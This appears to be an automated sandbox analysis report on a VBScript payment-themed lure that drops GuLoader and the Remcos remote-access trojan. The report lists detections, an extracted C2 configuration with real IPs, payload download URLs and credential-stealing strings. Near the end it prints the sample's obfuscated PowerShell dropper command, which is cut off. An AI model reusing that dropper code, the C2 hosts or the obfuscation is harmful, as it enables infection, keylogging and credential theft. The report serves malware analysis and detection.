Windows Analysis Report
PAYMENT - STATEMENT ADVISE.vbs

Overview

General Information

Sample name: PAYMENT - STATEMENT ADVISE.vbs
Analysis ID: 1467964
MD5: 8e3c190eff5e1e796f9cd8ac0eb18d0b
SHA1: 751c299c930a6975b1f311c3d645554d0cfe8654
SHA256: a1b94e324beb19da2cabb254652df7c75dfcdad3c099012bb10e06448198d204
Tags: RATRemcosRATvbs
Infos:

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Maps a DLL or memory area into another process
Obfuscated command line found
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
 https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
Name Description Attribution Blogpost URLs Link
CloudEyE, GuLoader CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

AV Detection
barindex
Found malware configuration
Source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": "103.237.87.32:1999:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VEYV6I", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Multi AV Scanner detection for domain / URL
Source: http://103.237.86.247/mtyozjDM72.bin Virustotal: Detection: 10% Perma Link
Source: http://103.237.86.247/acidizes.mso Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for submitted file
Source: PAYMENT - STATEMENT ADVISE.vbs ReversingLabs: Detection: 37%
Source: PAYMENT - STATEMENT ADVISE.vbs Virustotal: Detection: 14% Perma Link
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: Binary string: indows\System.Core.pdb* source: powershell.exe, 00000005.00000002.2444255599.00000000076F9000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 8_2_240C10F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 8_2_240C6580 FindFirstFileExA, 8_2_240C6580
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040AE51 FindFirstFileW,FindNextFileW, 11_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 13_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 14_2_00407898

Software Vulnerabilities
barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: 103.237.87.32
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:64545 -> 103.237.87.32:1999
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View IP Address: 103.237.86.247 103.237.86.247
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: BGNR-AP2BainandCompanySG BGNR-AP2BainandCompanySG
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /acidizes.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mtyozjDM72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: unknown TCP traffic detected without corresponding DNS query: 103.237.86.247
Source: global traffic HTTP traffic detected: GET /acidizes.mso HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /mtyozjDM72.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.237.86.247Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: wab.exe, 00000008.00000002.3287023885.0000000024090000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: wab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: wab.exe, 00000008.00000002.3287311337.0000000024500000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 00000008.00000002.3287311337.0000000024500000.00000040.10000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.2
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.23
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.8
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.2
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.24
Source: powershell.exe, 00000002.00000002.2582058655.00000192819AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2582058655.000001928022A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/a
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/ac
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/aci
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/acid
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/acidi
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/acidiz
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/acidize
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/acidizes
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/acidizes.
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/acidizes.m
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/acidizes.ms
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/acidizes.mso
Source: powershell.exe, 00000002.00000002.2582058655.000001928022A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/acidizes.msoP
Source: powershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/acidizes.msoXR
Source: wab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/mtyozjDM72.bin
Source: wab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.237.86.247/mtyozjDM72.binW
Source: powershell.exe, 00000002.00000002.2582058655.0000019281E1A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.237H
Source: wscript.exe, 00000000.00000003.2000810163.00000203A10CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002275025.00000203A10D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2000810163.00000203A10CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002275025.00000203A10D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabP
Source: wscript.exe, 00000000.00000003.2000810163.00000203A10CD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2002275025.00000203A10D8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/ent
Source: wscript.exe, 00000000.00000003.1998069751.00000203A1123000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1998183309.00000203A114B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?d7cbb27807
Source: wab.exe, 00000008.00000002.3276172736.00000000084F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000002.00000002.2695061689.0000019290072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2582058655.0000019280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2439904128.0000000004B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: wab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: wab.exe, 00000008.00000002.3287023885.0000000024090000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 00000008.00000002.3287023885.0000000024090000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000002.00000002.2582058655.0000019280001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2439904128.0000000004B81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lBjq
Source: powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000005.00000002.2439904128.0000000004CDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2582058655.0000019281299000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: wab.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: powershell.exe, 00000002.00000002.2695061689.0000019290072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2442003706.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: wab.exe, wab.exe, 0000000E.00000002.2508816421.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: wab.exe String found in binary or memory: https://www.google.com/accounts/servicelogin

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Installs a global keyboard hook
Source: C:\Program Files (x86)\Windows Mail\wab.exe Windows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exe Jump to behavior
Contains functionality for read data from the clipboard
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0041183A OpenClipboard,GetLastError,DeleteFileW, 11_2_0041183A
Contains functionality to modify clipboard data
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 11_2_0040987A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 11_2_004098E2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 13_2_00406DFC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 13_2_00406E9F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 14_2_004068B5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 14_2_004072B5

E-Banking Fraud
barindex
Yara detected Remcos RAT
Source: Yara match File source: 00000008.00000002.3276172736.0000000008531000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3271388779.0000000002A7F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_1084.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3528, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1084, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Sample has a suspicious name (potential lure to open the executable)
Source: PAYMENT - STATEMENT ADVISE.vbs Static file information: Suspicious name
Very long command line found
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9337
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 9337
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9337 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 9337 Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers Recovers Rowth Afhaengighedsforhold Filten Judaeophobia Baadebyggeres Large54 paaskrev Skylining indskriften Hackeymal Juvenolatry Satinforets Aangstrmenes glimtets Sideopdeling Sorehawk Vandkmmet Crystallizable Brummekors Hyphomycetic Soegetid Anan observatoriers';If (${host}.CurrentCulture) {$kbspriserne++;}Function Charcuteries($Stamgster){$Papillons=$Stamgster.Length-$kbspriserne;$Laddered='SUBsTRI';$Laddered+='ng';For( $Tubelike193=7;$Tubelike193 -lt $Papillons;$Tubelike193+=8){$Recovers+=$Stamgster.$Laddered.Invoke( $Tubelike193, $kbspriserne);}$Recovers;}function Venerator($Strongbark56){ & ($Verdant) ($Strongbark56);}$Resina=Charcuteries 'Suldan,MUnconvioC,njugazAtionspiKursustlAabninglInseminaskuffel/Hebraic5Kontrol.Fumarat0Shi.lda kultur (Pt.lonoWSammensiTraitornP urisydMinellaoBrachetwSoyledfsGaddisw Forlng,NComma.iT Orient Ribleth1 P.trol0 Baulks. Skovhu0Voks.nu;.lobosi PseudocW Dolkesi PresennAmynodo6Brandsk4A savem;Unprote Skri lxSipling6 Ine,ha4 Cronet;Distrib Benz,nmrIdolakiv Assist:Claspin1Offentl2Sesambo1Frdiggr.Formumm0,verdis)S.eetin Oris.olGAuditr,eUsurpedcCond.nskHerman.oUdruste/ Ddsspr2wylingj0Brnegaa1Reveill0Tr,pone0Barnevo1Overneu0Uploop,1 Kultur HerlighFEndothei sickanrF,rfarse SvigtefBonendeoUvidglixTuttern/Abjudgi1Hospita2Wastryg1Hierarc.Overhea0.quabat ';$Swinburnian=Charcuteries 'LandsdkU ,treamsPres.deeStudie rReparat-Firk ntADriftspgBaba.akeRetroflnBallonot Mucige ';$Judaeophobia=Charcuteries ',dvalgsh GrumphtReboteltRigsmalp E tals: Udbasu/Boundle/ Felino1Slje,sr0 Sammen3Sta.let.Waterlo2Uncoagu3Cirrose7Agnersn.Naturfr8Burnets6Upro,uk. retfrd2Muticou4Int nda7 Tragic/Gal.ifoa,belfabcGiantnaiPenn sid,ndenhaiT,appeozSnderleeNic murs Medi.i.UnsensimGrikesas StyrtfoFinge,s ';$Tubelike193nsuetude=Charcuteries 'Intercl>precont ';$Verdant=Charcuteries 'PresanciM,rgarierobotizx e serc ';$Sultefden='paaskrev';$Electant = Charcuteries 'Pu.sigeekrumbencPi tsdihtestudioS,efuld W ggleh% inumssa AdultepRelandspdollargdAportlaa ,paanttCappucca Uty el%Placoph\FiskemeAPr vatin M.crobgKriminaiBulletmoKinlesssAppetispAsthmaseTvangstrRaastofmHyper.a.UsikkerAWin.berfWienervmCho,ine Vanarte&Tilsla,&Pestram TilbageSnafuincJusterihRekur ioUnculti Ranso ftAusc.lt ';Venerator (Charcuteries 'Plukfis$,ernekag Skaftel istteloScri.enbSlvt ssa SonatilVivendi:StokavsPXiphop,rUnempiraTenpou,eskruedesPrintertYawnproeOverplarOve,natnUnderkle JohanbsTrsti.e= U,admi( Brandsc Pro enm Bi.anhdepisarc Fiske e/ Anpa.tcNecessa Special$ Bl.dskEBadebuklOverla.e Stempec ongrestIdylliuaEnergiknAfhngectblaaste),ystifi ');Venerator (Charcuteries 'Dockhou$,egadyng M sreml
